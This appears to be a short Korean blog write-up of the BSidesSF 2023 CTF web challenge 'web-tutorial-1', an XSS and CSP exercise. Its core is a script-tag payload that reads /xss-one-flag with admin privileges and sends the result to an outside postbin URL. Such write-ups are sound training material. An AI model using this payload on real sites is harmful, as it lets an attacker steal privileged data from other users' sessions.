본문 바로가기
CTF

[BSidesSF 2023 CTF] web-tutorial-1

by skyepodium 2023. 4. 22.

1. 개요

XSS, CSP 문제

 

2. 분석

admin의 권한으로 /xss-one-flag를 읽고, 그 결과를 제가 만든 서버에 전송하도록 만듭니다.

<script>

fetch("/xss-one-flag")
  .then(r => r.text())
  .then(t => fetch("https://www.toptal.com/developers/postbin/1682170081878-4064430973958?flag="+t))

</script>

 

'CTF' 카테고리의 다른 글

[BSidesSF 2023 CTF] web-tutorial-3  (0) 2023.04.22
[BSidesSF 2023 CTF] web-tutorial-2  (0) 2023.04.22
[BSidesSF 2023 CTF] overflow  (0) 2023.04.22
[CryptoBurst CTF] breakfast  (0) 2022.08.20
[CryptoBurst CTF] postman  (0) 2022.08.20

관련글

티스토리툴바